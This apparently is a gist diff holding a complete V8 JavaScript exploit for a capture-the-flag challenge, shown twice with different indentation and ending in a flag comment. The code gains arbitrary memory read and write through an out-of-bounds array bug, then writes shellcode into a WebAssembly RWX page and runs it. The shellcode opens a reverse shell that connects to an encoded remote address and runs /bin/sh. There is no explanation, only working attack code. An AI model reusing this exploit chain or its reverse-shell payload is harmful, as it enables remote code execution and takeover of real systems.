wbowling · April 20, 2021 21:42
diff --git a/pwn.js b/pwn.js
 // uses https://github.com/saelo/jscpwn/blob/master/utils.js
 var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
 let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
 let f = wasm_mod.exports.hello;

 var arr1 = [1.1];
 var arr2 = [Date];

 var arr_map1 = arr1.oob();
 var arr_map2 = arr2.oob();

 print(arr_map1);
 print(Int64.fromDouble(arr_map1));
 print(Int64.fromDouble(arr_map2));

 var fake_arr = [
    arr_map1,
    0,
    arr_map2,
    new Int64("0x1000000000000").asDouble()
 ];

 var ab = new ArrayBuffer(0x41);

 var leak_arr = [fake_arr, ab, wasm_mod];
 leak_arr.oob(arr_map1);
 var fake_arr_addr = Int64.fromDouble(leak_arr[0]);
 var ab_addr = Int64.fromDouble(leak_arr[1]);
 let wasm_mod_addr = Int64.fromDouble(leak_arr[2]);


 print("ab_addr: " + ab_addr);
 print(fake_arr_addr);
 print(new Int64(fake_arr_addr- -0x30));

 var arr3 = [Date];
 arr3.oob(arr_map1);
 arr3[0] = new Int64(fake_arr_addr- -0x30).asDouble()
 arr3.oob(arr_map2);
 print(arr3[0].length);

 fake_arr[2] = new Int64(ab_addr).asDouble();
 oob_array = arr3[0];

 function read(addr, size) {
    oob_array[1] = new Int64(size).asDouble()
    oob_array[2] = new Int64(addr).asDouble()
    let a = new Uint8Array(ab, 0, size);
    return Array.from(a);
 }

 function write(addr, bytes) {
    oob_array[1] = new Int64(bytes.length).asDouble()
    oob_array[2] = new Int64(addr).asDouble()
    let a = new Uint8Array(ab);
    a.set(bytes);
 }

 function read64(addr) {
  var a = read(addr, 8);
  return new Int64(a)
 }


 console.log("wasm_mod_addr", wasm_mod_addr);
 rwx = read64(wasm_mod_addr-1+8*17)
 console.log("rwx", rwx);

 let shellcode = [
 0x6a, 0x29, 0x58, 0x6a, 0x2, 0x5f, 0x6a, 0x1, 0x5e, 0x99, 0xf, 0x5, 0x48, 0x89, 0xc5, 0x48, 0xb8, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x50, 0x48, 0xb8, 0x3, 0x1, 0x31, 0x38, 0x66, 0x2, 0x3c, 0x88, 0x48, 0x31, 0x4, 0x24, 0x6a, 0x2a, 0x58, 0x48, 0x89, 0xef, 0x6a, 0x10, 0x5a, 0x48, 0x89, 0xe6, 0xf, 0x5,
 0x6a, 0x3, 0x5e, 0x48, 0xff, 0xce, 0x78, 0xb, 0x56, 0x6a, 0x21, 0x58, 0x48, 0x89, 0xef, 0xf, 0x5, 0xeb, 0xef, 0x6a, 0x68, 0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x73, 0x50, 0x48, 0x89, 0xe7, 0x68, 0x72, 0x69, 0x1, 0x1, 0x81, 0x34, 0x24, 0x1, 0x1, 0x1, 0x1, 0x31, 0xf6, 0x56, 0x6a, 0x8, 0x5e, 0x48, 0x1, 0xe6, 0x56, 0x48, 0x89, 0xe6, 0x31, 0xd2, 0x6a, 0x3b, 0x58, 0xf, 0x5,
 ];
 write(rwx, shellcode);
 f();

 alert();

 // *CTF{D1d_y0u_p0p_4_calc_f0r_fun :P}
	// uses https://github.com/saelo/jscpwn/blob/master/utils.js
	var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
	let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
	let f = wasm_mod.exports.hello;

	var arr1 = [1.1];
	var arr2 = [Date];

	var arr_map1 = arr1.oob();
	var arr_map2 = arr2.oob();

	print(arr_map1);
	print(Int64.fromDouble(arr_map1));
	print(Int64.fromDouble(arr_map2));

	var fake_arr = [
	arr_map1,
	0,
	arr_map2,
	new Int64("0x1000000000000").asDouble()
	];

	var ab = new ArrayBuffer(0x41);

	var leak_arr = [fake_arr, ab, wasm_mod];
	leak_arr.oob(arr_map1);
	var fake_arr_addr = Int64.fromDouble(leak_arr[0]);
	var ab_addr = Int64.fromDouble(leak_arr[1]);
	let wasm_mod_addr = Int64.fromDouble(leak_arr[2]);


	print("ab_addr: " + ab_addr);
	print(fake_arr_addr);
	print(new Int64(fake_arr_addr- -0x30));

	var arr3 = [Date];
	arr3.oob(arr_map1);
	arr3[0] = new Int64(fake_arr_addr- -0x30).asDouble()
	arr3.oob(arr_map2);
	print(arr3[0].length);

	fake_arr[2] = new Int64(ab_addr).asDouble();
	oob_array = arr3[0];

	function read(addr, size) {
	oob_array[1] = new Int64(size).asDouble()
	oob_array[2] = new Int64(addr).asDouble()
	let a = new Uint8Array(ab, 0, size);
	return Array.from(a);
	}

	function write(addr, bytes) {
	oob_array[1] = new Int64(bytes.length).asDouble()
	oob_array[2] = new Int64(addr).asDouble()
	let a = new Uint8Array(ab);
	a.set(bytes);
	}

	function read64(addr) {
	var a = read(addr, 8);
	return new Int64(a)
	}


	console.log("wasm_mod_addr", wasm_mod_addr);
	rwx = read64(wasm_mod_addr-1+8*17)
	console.log("rwx", rwx);

	let shellcode = [
	0x6a, 0x29, 0x58, 0x6a, 0x2, 0x5f, 0x6a, 0x1, 0x5e, 0x99, 0xf, 0x5, 0x48, 0x89, 0xc5, 0x48, 0xb8, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x50, 0x48, 0xb8, 0x3, 0x1, 0x31, 0x38, 0x66, 0x2, 0x3c, 0x88, 0x48, 0x31, 0x4, 0x24, 0x6a, 0x2a, 0x58, 0x48, 0x89, 0xef, 0x6a, 0x10, 0x5a, 0x48, 0x89, 0xe6, 0xf, 0x5,
	0x6a, 0x3, 0x5e, 0x48, 0xff, 0xce, 0x78, 0xb, 0x56, 0x6a, 0x21, 0x58, 0x48, 0x89, 0xef, 0xf, 0x5, 0xeb, 0xef, 0x6a, 0x68, 0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x73, 0x50, 0x48, 0x89, 0xe7, 0x68, 0x72, 0x69, 0x1, 0x1, 0x81, 0x34, 0x24, 0x1, 0x1, 0x1, 0x1, 0x31, 0xf6, 0x56, 0x6a, 0x8, 0x5e, 0x48, 0x1, 0xe6, 0x56, 0x48, 0x89, 0xe6, 0x31, 0xd2, 0x6a, 0x3b, 0x58, 0xf, 0x5,
	];
	write(rwx, shellcode);
	f();

	alert();

	// *CTF{D1d_y0u_p0p_4_calc_f0r_fun :P}